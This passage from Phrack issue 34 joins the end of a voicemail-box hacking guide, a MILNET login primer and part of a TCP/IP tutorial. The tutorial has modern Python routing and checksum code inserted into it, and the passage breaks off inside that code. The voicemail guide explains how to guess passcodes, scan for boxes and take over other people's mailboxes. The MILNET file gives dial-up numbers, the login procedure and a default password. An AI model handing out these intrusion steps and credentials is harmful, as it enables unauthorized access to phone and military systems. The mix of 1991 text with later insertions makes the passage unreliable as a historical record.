You can make a guest account for someone, give them a password, and leave them messages. To access their guest account, they just login as you would except they enter their guest passcode. Cindy systems also have a feature where you can have it call a particular number and deliver a recorded message. However, I have yet to get this feature to work on any Cindy boxes that I have.

MESSAGE CENTER

MESSAGE CENTER is also very popular, especially with direct dials. To login on a Message Center, hit the (*) key during the greeting and the system will respond with 'Hello . Please enter your passcode.' These vmbs are very tricky with their passcode methods. The first trick is that when you enter an invalid passcode it will stop you one digit AFTER the maximum passcode length. E.g., if you enter 1-2-3-4-5 and it gives you an error message as soon as you enter the fifth digit, that means the system uses a four digit passcode, which is most common on Message Centers. The second trick is that if you enter an invalid code the first time, no matter what you enter as the second passcode it will give you an error message and ask again. Then if you enter the correct passcode the second and third time it will let you login. Also, most Message Centers do not have a default; instead the new boxes are 'open' and when you hit (*) it will let you in. After hitting (*) the first time to login to a box you can hit (*) again and it will say 'Welcome to the Message Center.' and from there you can dial other extensions. This last feature can be useful for scanning outside a box. To find a new box, just keep entering box numbers and hitting (*) to login. If it doesn't say something to the effect of welcome to your new mailbox then just hit (*) again and it will send you back to the main system so you can enter another box. This way you will not be disconnected. Once you find a box, you can enter (6) 'M'ake a message to scan for other boxes with generic names. After hitting (6) it will ask for a mailbox number.
You can keep entering mailbox numbers until you find a generic one. Then you can cancel your message and go hack it out.

Q VOICE MAIL

Q VOICE MAIL is a rather nice system but not as common. It identifies itself with 'Welcome to Q Voice Mail Paging' so there is no question about what system it is. The box numbers are usually five digits and to login you enter (0) like a Cindy system. From the main menu you can enter (3) to scan other boxes.

There are many more systems I recognize but do not know the name for them. You will become familiar with these systems too.

CONCLUSION

You can use someone else's vmb system to practice the methods outlined above, but if you want a box that will last you need to scan out a virgin system. If you did everything above and could not get a vmb, try again on another system. If you follow everything correctly, I guarantee you will have more vmbs than you know what to do with. When you start getting a lot of them, if you are having trouble, or just want to say hi, be sure to drop me a line on either of my internet addresses, or leave me a voice mail message.

NOTE: Some information was purposely not included in this file to prevent abuse to various systems.

Night Ranger
gbatson@clutx.clarkson.edu
1-800-666-2336 Box 602 (After Business Hours)
1-800-435-2008 Box 896 (After Business Hours)
_______________________________________________________________________________

==Phrack Inc.==

Volume Three, Issue Thirty-four, File #7 of 11

                 _____________________________________
                |                                     |
                | : : : : : : : : : : : : : : : : : : |
                | :     Brigadier General Swipe     : |
                | : : : : : : : : : : : : : : : : : : |
                |                                     |
                |             presents:               |
                |_____________________________________|
                |                                     |
                |      An Introduction to MILNET      |
                |                                     |
                |_____________________________________|

:
:Introduction:
:

First of all, MILNET is a system used by branches of the military for unclassified communications. MILNET produces that infamous TAC login xxx. TAC MILNET is run out of the University of Southern California. USC is the ISI master dial up.
I would also like to point out that the Department of Defense tends to frown on people browsing through their system. With that in mind, here is a basic overview of MILNET operations.

:
:Logging On:
:

MILNET can be reached through the "nets" or can be directly connected to by dialing 1-800-368-2217 or 213-306-1366. The latter is the ISI master dial up. Most military bases connect through the 800 dial up owned by AT&T.

ISIE MASTER LOGON PROCEDURE
----------------------------
1> call 213-306-1366
2> when the phone stops ringing you are connected
3> enter location number (9 digits) + 1 or 0
4> hang up and it will call you
5> pick up the phone and hit the '*' on your phone
6> hit a carriage return on the computer
7> at the 'what class?' prompt hit RETURN
8> then a 'go' prompt will appear and log on as you would the 800 number.

MILNET LOGIN PROCEDURE
-----------------------
> When you first connect you will see:

    'WELCOME TO DDN. FOR OFFICIAL USE ONLY. TAC LOGIN
     CALL NIC 1-800-235-3155 FOR HELP
     WRPAT TAC 113 #:36

> the person logging on types:  @o 1/103

  YOU ALWAYS TYPE @o

  then other connections are:

    ISIA   3/103
    ISIB   10:3/52
    ISID   10:0/27
    ISIE   1/103   (THE EXAMPLE)
    ISIF   2/103
    VAX A  10:2/27

> Next you will see a 'USER-ID' prompt. The first 4 characters vary but it is always followed by a '-' and whatever connection you choose.

    User-Id: (example) CER5-ISIE or MRW1-ISIE

> The first three letters are the initials of the user followed by a random number (1-9).

    Access Code: (example) 2285UNG6A or 22L8KK5CH

> An access code will never contain a ( 1, 0, G, Z).

@ USERNAME + PASSWORD
IE USERNAME SAC.512AREFW-LGTO

THE USERNAME EXPLANATION:
-------------------------
The first 3 letters in the example given above are SAC. This stands for Strategic Air Command, a branch of the Air Force. Following that is a "." Then the unit number and the prime mission. In this case "512AREFW", (512th AIR REFUELING WING).
Then a '-' and the Individual Squadron name 'LGTO' (LOGISTICS GROUND TRANSPORTATION OPERATIONS), a fancy name for the motor pool. The password will not be echoed back and should be entered after the username. The new user password as a default is: NEW-UZER-ACNT.

:
:Options:
:

PROGRAMS AVAILABLE TO SAC USERS:
-------------------------------
ADUTY        aids in management of additional duty assignments.
             (International help - use the ? and keys, HELP.)
ARCHIVE      requests files to be stored on tape for later retrieval.
             (Type HELP ARCHIVE at TOPS-20.)
CHAT         Provides near real time communication between terminal users
             on the same host computer. (Use ? with CHAT.)
DAILY        Executive appointment scheduling program
DCOPY        Handles output on DIABLO and XEROX printers
EMACS        Powerful full-screen text editor
FOLLOW       Suspense follow up program
FTP          provides file transfer capabilities between host computers
FKEYS        allows user to define function key (real spiffaruni)
HELP         the command used by stupid generals or hackers that have never
             used milnet before
HERMES       E-Mail
NCPCALC      spreadsheet program
PHOTO        saves transcripts of sessions
REMIND       sends user-created reminders
RIPSORT      a sophisticated data sorting program (Described in SAC's User
             manual (sorry))
SCRIBE       a powerful text formatter for preparing documents. (ISI's
             manual, SCRIBE manual - soon on MILNET V.2)
SPELL        text file spelling checker. (HELP at TOPS-20 and directory
             international help -?)
SUSCON       allows the creating, sending, and clearing of suspenses.
             (international help - ? and , HELP command)
TACOPY       used for printing hard copies of files (international help - ?)
TALK         pretty much the same as chat.
TIPCOPY      predecessor of TACOPY
TEACH-EMACS  (SELF EXPLANATORY: GIVES LIST OF COMMANDS)
TN           Tel-Net provides multi-host access on MILNET. (HELP at TOPS-20
             and directory, international help - use ? and )
XED          line oriented text editor.
             (HELP at TOPS-20 and directory)

:
:Logging Out:
:

TYPE: @L

:
:ID Card:
:

When a user gets a MILNET account he/she receives a card in the mail that looks similar to the diagram below. It is credit card sized and will be blue & white.

       _______________________________________
      /                                       \
      | HOST USC-ISIE 26.1.0.103              |
      | HOST ADMINISTRATOR GORDON,VICKI L.    |
      |---------------------------------------|
      | DDN CARD HOLDER:                      |
      |   SMITH, BILL A, 1st LT.              |
      |   CARD 418475                         |
      |---------------------------------------|
      | USER ID:CER5-ISIE                     |
      | ACCESS CODE:2285ANI6A                 |
      | USERNAME: SAC.512AREFW-LGTO           |
      | PASSWORD: NEW-UZER-ACNT               |
      \_______________________________________/

_______________________________________________________________________________

==Phrack Inc.==

Volume Three, Issue Thirty-Four, File #8 of 11

                          A TCP/IP Tutorial : Behind The Internet
                                    Part Two of Two
                                   October 4th, 1991

                                 Presented by The Not

5.  Internet Protocol

The IP module is central to internet technology and the essence of IP is its route table. IP uses this in-memory table to make all decisions about routing an IP packet. The content of the route table is defined by the network administrator. Mistakes block communication.

To understand how a route table is used is to understand internetworking. This understanding is necessary for the successful administration and maintenance of an IP network.

The route table is best understood by first having an overview of routing, then learning about IP network addresses, and then looking at the details.

5.1 Direct Routing

The figure below is of a tiny internet with 3 computers: A, B, and C. Each computer has the same TCP/IP protocol stack as in Figure 1. Each computer's Ethernet interface has its own Ethernet address.
Each computer has an IP address assigned to the IP interface by the network manager, who also has assigned an IP network number to the Ethernet.

            A      B      C
            |      |      |
          --o------o------o--
          Ethernet 1
          IP network "development"

               Figure 6.  One IP Network

When A sends an IP packet to B, the IP header contains A's IP address as the source IP address, and the Ethernet header contains A's Ethernet address as the source Ethernet address. Also, the IP header contains B's IP address as the destination IP address and the Ethernet header contains B's Ethernet address as the destination Ethernet address.

          ----------------------------------------
          |address            source  destination|
          ----------------------------------------
          |IP header          A       B          |
          |Ethernet header    A       B          |
          ----------------------------------------

      TABLE 5.  Addresses in an Ethernet frame for an IP packet
                from A to B

For this simple case, IP is overhead because the IP adds little to the service offered by Ethernet. However, IP does add cost: the extra CPU processing and network bandwidth to generate, transmit, and parse the IP header.

When B's IP module receives the IP packet from A, it checks the destination IP address against its own, looking for a match, then it passes the datagram to the upper-level protocol.

This communication between A and B uses direct routing.

5.2 Indirect Routing

The figure below is a more realistic view of an internet. It is composed of 3 Ethernets and 3 IP networks connected by an IP-router called computer D. Each IP network has 4 computers; each computer has its own IP address and Ethernet address.

          A      B      C      ----D----      E      F      G
          |      |      |      |   |   |      |      |      |
        --o------o------o------o-  |  -o------o------o------o--
        Ethernet 1                 |   Ethernet 2
        IP network "development"   |   IP network "accounting"
                                   |
                                   |
                                   |   H      I      J
                                   |   |      |      |
                                 --o---o------o------o--
                                 Ethernet 3
                                 IP network "factory"

            Figure 7.  Three IP Networks; One internet

Except for computer D, each computer has a TCP/IP protocol stack like that in Figure 1.
Computer D is the IP-router; it is connected to all 3 networks and therefore has 3 IP addresses and 3 Ethernet addresses. Computer D has a TCP/IP protocol stack similar to that in Figure 3, except that it has 3 ARP modules and 3 Ethernet drivers instead of 2. Please note that computer D has only one IP module.

The network manager has assigned a unique number, called an IP network number, to each of the Ethernets. The IP network numbers are not shown in this diagram, just the network names.

When computer A sends an IP packet to computer B, the process is identical to the single network example above. Any communication between computers located on a single IP network matches the direct routing example discussed previously.

When computer D and A communicate, it is direct communication. When computer D and E communicate, it is direct communication. When computer D and H communicate, it is direct communication. This is because each of these pairs of computers is on the same IP network.

However, when computer A communicates with a computer on the far side of the IP-router, communication is no longer direct. A must use D to forward the IP packet to the next IP network. This communication is called "indirect".

This routing of IP packets is done by IP modules and happens transparently to TCP, UDP, and the network applications.

If A sends an IP packet to E, the source IP address and the source Ethernet address are A's. The destination IP address is E's, but because A's IP module sends the IP packet to D for forwarding, the destination Ethernet address is D's.

          ----------------------------------------
          |address            source  destination|
          ----------------------------------------
          |IP header          A       E          |
          |Ethernet header    A       D          |
          ----------------------------------------

      TABLE 6.
                Addresses in an Ethernet frame for an IP packet
                from A to E (before D)

D's IP module receives the IP packet and upon examining the destination IP address, says "This is not my IP address," and sends the IP packet directly to E.

          ----------------------------------------
          |address            source  destination|
          ----------------------------------------
          |IP header          A       E          |
          |Ethernet header    D       E          |
          ----------------------------------------

      TABLE 7.  Addresses in an Ethernet frame for an IP packet
                from A to E (after D)

In summary, for direct communication, both the source IP address and the source Ethernet address are the sender's, and the destination IP address and the destination Ethernet address are the recipient's. For indirect communication, the IP addresses and Ethernet addresses do not pair up in this way.

This example internet is a very simple one. Real networks are often complicated by many factors, resulting in multiple IP-routers and several types of physical networks. This example internet might have come about because the network manager wanted to split a large Ethernet in order to localize Ethernet broadcast traffic.

5.3 IP Module Routing Rules

This overview of routing has shown what happens, but not how it happens. Now let's examine the rules, or algorithm, used by the IP module.

For an outgoing IP packet, entering IP from an upper layer, IP must decide whether to send the IP packet directly or indirectly, and IP must choose a lower network interface. These choices are made by consulting the route table.

For an incoming IP packet, entering IP from a lower interface, IP must decide whether to forward the IP packet or pass it to an upper layer. If the IP packet is being forwarded, it is treated as an outgoing IP packet.

When an incoming IP packet arrives it is never forwarded back out through the same network interface.

These decisions are made before the IP packet is handed to the lower interface and before the ARP table is consulted.
5.4 IP Address

The network manager assigns IP addresses to computers according to the IP network to which the computer is attached. One part of a 4-byte IP address is the IP network number, the other part is the IP computer number (or host number). For the computer in table 1, with an IP address of 223.1.2.1, the network number is 223.1.2 and the host number is 1.

The portion of the address that is used for network number and for host number is defined by the upper bits in the 4-byte address. All example IP addresses in this tutorial are of type class C, meaning that the upper 3 bits indicate that 21 bits are the network number and 8 bits are the host number. This allows 2,097,152 class C networks with up to 254 hosts on each network.

The IP address space is administered by the NIC (Network Information Center). All internets that are connected to the single world-wide Internet must use network numbers assigned by the NIC. If you are setting up your own internet and you are not intending to connect it to the Internet, you should still obtain your network numbers from the NIC. If you pick your own number, you run the risk of confusion and chaos in the eventuality that your internet is connected to another internet.

5.5 Names

People refer to computers by names, not numbers. A computer called alpha might have the IP address of 223.1.2.1. For small networks, this name-to-address translation data is often kept on each computer in the "hosts" file. For larger networks, this translation data file is stored on a server and accessed across the network when needed. A few lines from that file might look like this:

          223.1.2.1     alpha
          223.1.2.2     beta
          223.1.2.3     gamma
          223.1.2.4     delta
          223.1.3.2     epsilon
          223.1.4.2     iota

The IP address is the first column and the computer name is the second column.

In most cases, you can install identical "hosts" files on all computers. You may notice that "delta" has only one entry in this file even though it has 3 IP addresses.
Delta can be reached with any of its IP addresses; it does not matter which one is used. When delta receives an IP packet and looks at the destination address, it will recognize any of its own IP addresses.

IP networks are also given names. If you have 3 IP networks, your "networks" file for documenting these names might look something like this:

          223.1.2     development
          223.1.3     accounting
          223.1.4     factory

The IP network number is in the first column and its name is in the second column.

From this example you can see that alpha is computer number 1 on the development network, beta is computer number 2 on the development network and so on. You might also say that alpha is development.1, beta is development.2, and so on.

The above hosts file is adequate for the users, but the network manager will probably replace the line for delta with:

          223.1.2.4     devnetrouter delta
          223.1.3.1     accnetrouter
          223.1.4.1     facnetrouter

These three new lines for the hosts file give each of delta's IP addresses a meaningful name. In fact, the first IP address listed has 2 names; "delta" and "devnetrouter" are synonyms. In practice "delta" is the general-purpose name of the computer and the other 3 names are only used when administering the IP route table. (The router names follow the networks file above: 223.1.3 is "accounting", so 223.1.3.1 is the accounting-net router, and 223.1.4 is "factory", so 223.1.4.1 is the factory-net router.)

These files are used by network administration commands and network applications to provide meaningful names. They are not required for operation of an internet, but they do make it easier for us.

5.6 IP Route Table

How does IP know which lower network interface to use when sending out an IP packet? IP looks it up in the route table using a search key of the IP network number extracted from the IP destination address.

The route table contains one row for each route. The primary columns in the route table are: IP network number, direct/indirect flag, router IP address, and interface number. This table is referred to by IP for each outgoing IP packet.

On most computers the route table can be modified with the "route" command.
The content of the route table is defined by the network manager, because the network manager assigns the IP addresses to the computers.

5.7 Direct Routing Details

To explain how the route table is used, let us visit in detail the routing situations we have reviewed previously.

          ---------         ---------
          | alpha |         | beta  |
          |    1  |         |  1    |
          ---------         ---------
               |               |
       --------o---------------o-
        Ethernet 1
        IP network "development"

            Figure 8.  Close-up View of One IP Network

The route table inside alpha looks like this:

       --------------------------------------------------------------
       |network      direct/indirect flag   router   interface number|
       --------------------------------------------------------------
       |development  direct                          1               |
       --------------------------------------------------------------

            TABLE 8.  Example Simple Route Table

This view can be seen on some UNIX systems with the "netstat -r" command. With this simple network, all computers have identical routing tables.

For discussion, the table is printed again without the network number translated to its network name.

       --------------------------------------------------------------
       |network      direct/indirect flag   router   interface number|
       --------------------------------------------------------------
       |223.1.2      direct                          1               |
       --------------------------------------------------------------

            TABLE 9.  Example Simple Route Table with Numbers

5.8 Direct Scenario

Alpha is sending an IP packet to beta. The IP packet is in alpha's IP module and the destination IP address is beta or 223.1.2.2. IP extracts the network portion of this IP address and scans the first column of the table looking for a match. With this network a match is found on the first entry.

The other information in this entry indicates that computers on this network can be reached directly through interface number 1. An ARP table translation is done on beta's IP address then the Ethernet frame is sent directly to beta via interface number 1.
If an application tries to send data to an IP address that is not on the development network, IP will be unable to find a match in the route table. IP then discards the IP packet. Some computers provide a "Network not reachable" error message.

5.9 Indirect Routing Details

Now, let's take a closer look at the more complicated routing scenario that we examined previously.

          ---------         ---------         ---------
          | alpha |         | delta |         |epsilon|
          |    1  |         |1  2  3|         |   1   |
          ---------         ---------         ---------
               |             |  |  |              |
       --------o---------------o- | -o--------------o--------
        Ethernet 1               |   Ethernet 2
        IP network "Development" |   IP network "accounting"
                                 |
                                 |     --------
                                 |     | iota |
                                 |     |  1   |
                                 |     --------
                                 |        |
                               --o--------o--------
                               Ethernet 3
                               IP network "factory"

            Figure 9.  Close-up View of Three IP Networks

The route table inside alpha looks like this:

       ---------------------------------------------------------------------
       |network      direct/indirect flag   router          interface number|
       ---------------------------------------------------------------------
       |development  direct                                 1               |
       |accounting   indirect               devnetrouter    1               |
       |factory      indirect               devnetrouter    1               |
       ---------------------------------------------------------------------

            TABLE 10.  Alpha Route Table

For discussion the table is printed again using numbers instead of names.

       ---------------------------------------------------------------------
       |network      direct/indirect flag   router          interface number|
       ---------------------------------------------------------------------
       |223.1.2      direct                                 1               |
       |223.1.3      indirect               223.1.2.4       1               |
       |223.1.4      indirect               223.1.2.4       1               |
       ---------------------------------------------------------------------

            TABLE 11.  Alpha Route Table with Numbers

The router in alpha's route table is the IP address of delta's connection to the development network.

5.10 Indirect Scenario

Alpha is sending an IP packet to epsilon. The IP packet is in alpha's IP module and the destination IP address is epsilon (223.1.3.2).
IP extracts the network portion of this IP address (223.1.3) and scans the first column of the table looking for a match. A match is found on the second entry.

This entry indicates that computers on the 223.1.3 network can be reached through the IP-router devnetrouter. Alpha's IP module then does an ARP table translation for devnetrouter's IP address and sends the IP packet directly to devnetrouter through alpha's interface number 1. The IP packet still contains the destination address of epsilon.

The IP packet arrives at delta's development network interface and is passed up to delta's IP module. The destination IP address is examined and because it does not match any of delta's own IP addresses, delta decides to forward the IP packet.

Delta's IP module extracts the network portion of the destination IP address (223.1.3) and scans its route table for a matching network field. Delta's route table looks like this:

       ---------------------------------------------------------------------
       |network      direct/indirect flag   router          interface number|
       ---------------------------------------------------------------------
       |development  direct                                 1               |
       |accounting   direct                                 3               |
       |factory      direct                                 2               |
       ---------------------------------------------------------------------

            TABLE 12.  Delta's Route Table

Below is delta's table printed again, without the translation to names. (The second row is the accounting network, 223.1.3, reached through interface 3; the third is the factory network, 223.1.4, reached through interface 2, matching the networks file in section 5.5 and the interface numbering in Figure 9.)

       ---------------------------------------------------------------------
       |network      direct/indirect flag   router          interface number|
       ---------------------------------------------------------------------
       |223.1.2      direct                                 1               |
       |223.1.3      direct                                 3               |
       |223.1.4      direct                                 2               |
       ---------------------------------------------------------------------

            TABLE 13.  Delta's Route Table with Numbers

The match is found on the second entry. IP then sends the IP packet directly to epsilon through interface number 3. The IP packet contains the IP destination address of epsilon and the Ethernet destination address of epsilon.
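The two scenarios of sections 5.8 and 5.10, worked through in code. The Python below is an added example and is not part of the tutorial: it implements the classful network-number rule of section 5.4 (generalized to classes A and B, which the same upper bits encode) and the route-table lookup of sections 5.6 through 5.10, then carries one packet from alpha to beta (direct) and one from alpha to epsilon via delta (indirect), reproducing the IP/Ethernet address pairings of Tables 5 through 7. The route tables are Tables 9, 11 and 13; the Ethernet addresses, the hop limit and every function and class name are assumptions made for this example.

```python
# Added example for sections 5.4 and 5.6-5.10: classful network-number
# extraction and hop-by-hop IP forwarding over the tutorial's hosts
# alpha, beta, delta and epsilon.  Not code from the tutorial.  The route
# tables are Tables 9, 11 and 13; the Ethernet (MAC) addresses, the hop
# limit and all names here are assumptions.


def network_number(ip):
    """Return the classful network number of a dotted-quad IP address.

    Section 5.4 uses only class C (upper bits 110 -> 24-bit network
    number); classes A (0xxxxxxx, 8 bits) and B (10xxxxxx, 16 bits)
    follow the same upper-bit rule, so the general case is shown.
    """
    octets = ip.split(".")
    first = int(octets[0])
    if first & 0x80 == 0:
        prefix_octets = 1
    elif first & 0xC0 == 0x80:
        prefix_octets = 2
    elif first & 0xE0 == 0xC0:
        prefix_octets = 3
    else:
        raise ValueError("%s is not a class A, B or C address" % ip)
    return ".".join(octets[:prefix_octets])


class Host:
    """One IP module with its interfaces and its route table (section 5.6)."""

    def __init__(self, name, interfaces, routes):
        self.name = name
        self.interfaces = interfaces   # {ifnum: (IP address, Ethernet address)}
        self.routes = routes           # [(network, flag, router IP, ifnum)]

    def owns(self, ip):
        return any(ip == addr for addr, _ in self.interfaces.values())

    def lookup(self, dst_ip):
        """Sections 5.3/5.6: match the destination's network number against
        the first column.  direct -> next hop is the destination itself;
        indirect -> next hop is the router column.  None = no route."""
        net = network_number(dst_ip)
        for network, flag, router, ifnum in self.routes:
            if network == net:
                return (dst_ip if flag == "direct" else router), ifnum
        return None


# Constructed Ethernet addresses; the tutorial never gives them.
MAC_A, MAC_B, MAC_E = "02:00:00:00:00:a1", "02:00:00:00:00:b2", "02:00:00:00:00:e5"
MAC_D1, MAC_D2, MAC_D3 = "02:00:00:00:00:d1", "02:00:00:00:00:d2", "02:00:00:00:00:d3"

HOSTS = {
    "alpha": Host("alpha", {1: ("223.1.2.1", MAC_A)},
                  [("223.1.2", "direct", None, 1),                # Table 11
                   ("223.1.3", "indirect", "223.1.2.4", 1),
                   ("223.1.4", "indirect", "223.1.2.4", 1)]),
    "beta": Host("beta", {1: ("223.1.2.2", MAC_B)},
                 [("223.1.2", "direct", None, 1),
                  ("223.1.3", "indirect", "223.1.2.4", 1),
                  ("223.1.4", "indirect", "223.1.2.4", 1)]),
    "delta": Host("delta", {1: ("223.1.2.4", MAC_D1),             # devnetrouter
                            2: ("223.1.4.1", MAC_D2),             # facnetrouter
                            3: ("223.1.3.1", MAC_D3)},            # accnetrouter
                  [("223.1.2", "direct", None, 1),                # Table 13
                   ("223.1.3", "direct", None, 3),
                   ("223.1.4", "direct", None, 2)]),
    "epsilon": Host("epsilon", {1: ("223.1.3.2", MAC_E)},
                    [("223.1.3", "direct", None, 1),
                     ("223.1.2", "indirect", "223.1.3.1", 1),
                     ("223.1.4", "indirect", "223.1.3.1", 1)]),
}


def send(hosts, src_name, dst_ip, max_hops=8):
    """Carry one IP packet from src_name toward dst_ip, one hop at a time.

    Returns (hops, status); each hop is the address pairing of Tables 5-7:
    (IP src, IP dst, Ethernet src, Ethernet dst).  The IP pair never changes
    in flight; the Ethernet pair is rewritten by every forwarder.  max_hops
    is an assumed guard against a routing loop between misconfigured tables.
    """
    arp = {ip: mac for h in hosts.values() for ip, mac in h.interfaces.values()}
    by_mac = {mac: h for h in hosts.values() for _, mac in h.interfaces.values()}
    current, ip_src, hops = hosts[src_name], None, []
    for _ in range(max_hops):
        route = current.lookup(dst_ip)
        if route is None:
            return hops, "Network not reachable"      # section 5.8 failure case
        next_hop, ifnum = route
        my_ip, my_mac = current.interfaces[ifnum]
        if ip_src is None:
            ip_src = my_ip                            # set once, by the originator
        eth_dst = arp[next_hop]                       # ARP on the next hop, not on dst
        hops.append((ip_src, dst_ip, my_mac, eth_dst))
        current = by_mac[eth_dst]
        if current.owns(dst_ip):
            return hops, "delivered to " + current.name
        # not one of its own addresses: section 5.3 says treat it as outgoing
    return hops, "hop limit exceeded (routing loop?)"
```

Run send(HOSTS, "alpha", "223.1.3.2") and compare the two hops with Tables 6 and 7: the IP pair stays (alpha, epsilon) for the whole trip, while the Ethernet pair is (alpha, delta's interface 1) on Ethernet 1 and (delta's interface 3, epsilon) on Ethernet 2. A destination whose network number matches no row returns "Network not reachable", the section 5.8 case, and the hop limit is the only thing standing between two tables that point at each other and the routing loops section 9 mentions.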
The IP packet arrives at epsilon and is passed up to epsilon's IP module. The destination IP address is examined and found to match with epsilon's IP address, so the IP packet is passed to the upper protocol layer.

5.11 Routing Summary

When an IP packet travels through a large internet it may go through many IP-routers before it reaches its destination. The path it takes is not determined by a central source but is a result of consulting each of the routing tables used in the journey. Each computer defines only the next hop in the journey and relies on that computer to send the IP packet on its way.

5.12 Managing the Routes

Maintaining correct routing tables on all computers in a large internet is a difficult task; network configuration is being modified constantly by the network managers to meet changing needs. Mistakes in routing tables can block communication in ways that are excruciatingly tedious to diagnose.

Keeping a simple network configuration goes a long way towards making a reliable internet. For instance, the most straightforward method of assigning IP networks to Ethernets is to assign a single IP network number to each Ethernet.

Help is also available from certain protocols and network applications. ICMP (Internet Control Message Protocol) can report some routing problems. For small networks the route table is filled manually on each computer by the network administrator. For larger networks the network administrator automates this manual operation with a routing protocol to distribute routes throughout a network.

When a computer is moved from one IP network to another, its IP address must change. When a computer is removed from an IP network its old address becomes invalid. These changes require frequent updates to the "hosts" file. This flat file can become difficult to maintain for even medium-size networks. The Domain Name System helps solve these problems.

6.  User Datagram Protocol

UDP is one of the two main protocols to reside on top of IP.
It offers service to the user's network applications. Example network applications that use UDP are: Network File System (NFS) and Simple Network Management Protocol (SNMP). The service is little more than an interface to IP.

UDP is a connectionless datagram delivery service that does not guarantee delivery. UDP does not maintain an end-to-end connection with the remote UDP module; it merely pushes the datagram out on the net and accepts incoming datagrams off the net.

UDP adds two values to what is provided by IP. One is the multiplexing of information between applications based on port number. The other is a checksum to check the integrity of the data.

6.1 Ports

How does a client on one computer reach the server on another?

The path of communication between an application and UDP is through UDP ports. These ports are numbered, beginning with zero. An application that is offering service (the server) waits for messages to come in on a specific port dedicated to that service. The server waits patiently for any client to request service.

For instance, the SNMP server, called an SNMP agent, always waits on port 161. There can be only one SNMP agent per computer because there is only one UDP port number 161. This port number is well known; it is a fixed number, an internet assigned number. If an SNMP client wants service, it sends its request to port number 161 of UDP on the destination computer.

When an application sends data out through UDP it arrives at the far end as a single unit. For example, if an application does 5 writes to the UDP port, the application at the far end will do 5 reads from the UDP port. Also, the size of each write matches the size of each read.

UDP preserves the message boundary defined by the application. It never joins two application messages together, or divides a single application message into parts.

6.2 Checksum

An incoming IP packet with an IP header type field indicating "UDP" is passed up to the UDP module by IP.
When the UDP module receives the UDP datagram from IP it examines the UDP checksum. If the checksum is zero, it means that the checksum was not calculated by the sender and can be ignored. Thus the sending computer's UDP module may or may not generate checksums. If Ethernet is the only network between the 2 UDP modules communicating, then you may not need checksumming. However, it is recommended that checksum generation always be enabled because at some point in the future a route table change may send the data across less reliable media.

If the checksum is valid (or zero), the destination port number is examined and if an application is bound to that port, an application message is queued for the application to read. Otherwise the UDP datagram is discarded. If the incoming UDP datagrams arrive faster than the application can read them and if the queue fills to a maximum value, UDP datagrams are discarded by UDP. UDP will continue to discard UDP datagrams until there is space in the queue.

7.  Transmission Control Protocol

TCP provides a different service than UDP. TCP offers a connection-oriented byte stream, instead of a connectionless datagram delivery service. TCP guarantees delivery, whereas UDP does not.

TCP is used by network applications that require guaranteed delivery and cannot be bothered with doing time-outs and retransmissions. The two most typical network applications that use TCP are File Transfer Protocol (FTP) and TELNET. Other popular TCP network applications include X-Window System, rcp (remote copy), and the r-series commands. TCP's greater capability is not without cost: it requires more CPU and network bandwidth. The internals of the TCP module are much more complicated than those in a UDP module.

Similar to UDP, network applications connect to TCP ports. Well-defined port numbers are dedicated to specific applications. For instance, the TELNET server uses port number 23.
The TELNET client can find the server simply by connecting to port 23 of TCP on the specified computer.

When the application first starts using TCP, the TCP module on the client's computer and the TCP module on the server's computer start communicating with each other. These two end-point TCP modules contain state information that defines a virtual circuit. This virtual circuit consumes resources in both TCP end-points. The virtual circuit is full duplex; data can go in both directions simultaneously. The application writes data to the TCP port, the data traverses the network and is read by the application at the far end.

As with all sliding window protocols, the protocol has a window size. The window size determines the amount of data that can be transmitted before an acknowledgement is required. For TCP, this amount is not a number of TCP segments but a number of bytes.

8.  Network Applications

Why do both TCP and UDP exist, instead of just one or the other?

They supply different services. Most applications are implemented to use only one or the other. You, the programmer, choose the protocol that best meets your needs. If you need a reliable stream delivery service, TCP might be best. If you need a datagram service, UDP might be best. If you need efficiency over long-haul circuits, TCP might be best. If you need efficiency over fast networks with short latency, UDP might be best. If your needs do not fall nicely into these categories, then the "best" choice is unclear. However, applications can make up for deficiencies in the choice. For instance if you choose UDP and you need reliability, then the application must provide reliability. If you choose TCP and you need a record oriented service, then the application must insert markers in the byte stream to delimit records.

What network applications are available?

There are far too many to list. The number is growing continually.
Some of the applications have existed since the beginning of internet technology: TELNET and FTP. Others are relatively new: X-Windows and SNMP. The following is a brief description of the applications mentioned in this tutorial.

8.1 TELNET

TELNET provides a remote login capability on TCP. The operation and appearance is similar to keyboard dialing through a telephone switch. On the command line the user types "telnet delta" and receives a login prompt from the computer called "delta".

TELNET works well; it is an old application and has widespread interoperability. Implementations of TELNET usually work between different operating systems. For instance, a TELNET client may be on VAX/VMS and the server on UNIX System V.

8.2 FTP

File Transfer Protocol (FTP), as old as TELNET, also uses TCP and has widespread interoperability. The operation and appearance is as if you TELNETed to the remote computer. But instead of typing your usual commands, you have to make do with a short list of commands for directory listings and the like. FTP commands allow you to copy files between computers.

8.3 rsh

Remote shell (rsh or remsh) is one of an entire family of remote UNIX style commands. The UNIX copy command, cp, becomes rcp. The UNIX "who is logged in" command, who, becomes rwho. The list continues and is referred to collectively as the "r" series commands or the "r*" (r star) commands.

The r* commands mainly work between UNIX systems and are designed for interaction between trusted hosts. Little consideration is given to security, but they provide a convenient user environment.

To execute the "cc file.c" command on a remote computer called delta, type "rsh delta cc file.c". To copy the "file.c" file to delta, type "rcp file.c delta:". To login to delta, type "rlogin delta", and if you administered the computers in a certain way, you will not be challenged with a password prompt.
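Before the UDP-based applications in 8.4 and 8.5, here is an added worked example (not from RFC 1180 or from this Phrack file) of the UDP checksum rule described earlier: it computes the checksum over the IPv4 pseudo-header, shows why a computed value of zero is sent as 0xFFFF, and distinguishes a zero (unchecked) datagram from a corrupted one. The addresses and ports are constructed sample values.

```python
"""UDP checksum over the IPv4 pseudo-header (added example, not RFC 1180 code)."""
import struct

UDP_PROTOCOL = 17


def ones_complement_sum(data: bytes) -> int:
    """Sum 16-bit big-endian words with end-around carry (RFC 1071 arithmetic)."""
    if len(data) % 2:
        data += b"\x00"  # an odd trailing byte is padded with a zero byte
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return total


def pseudo_header(src_ip: bytes, dst_ip: bytes, udp_length: int) -> bytes:
    """IPv4 pseudo-header: source, destination, zero byte, protocol, UDP length."""
    return src_ip + dst_ip + struct.pack("!BBH", 0, UDP_PROTOCOL, udp_length)


def udp_checksum(src_ip: bytes, dst_ip: bytes, header_and_payload: bytes) -> int:
    """Checksum to place in the header (the checksum field must be zero on input).

    A computed value of 0 is transmitted as 0xFFFF: on the wire, 0 means
    "the sender did not compute a checksum", so it cannot also mean "valid".
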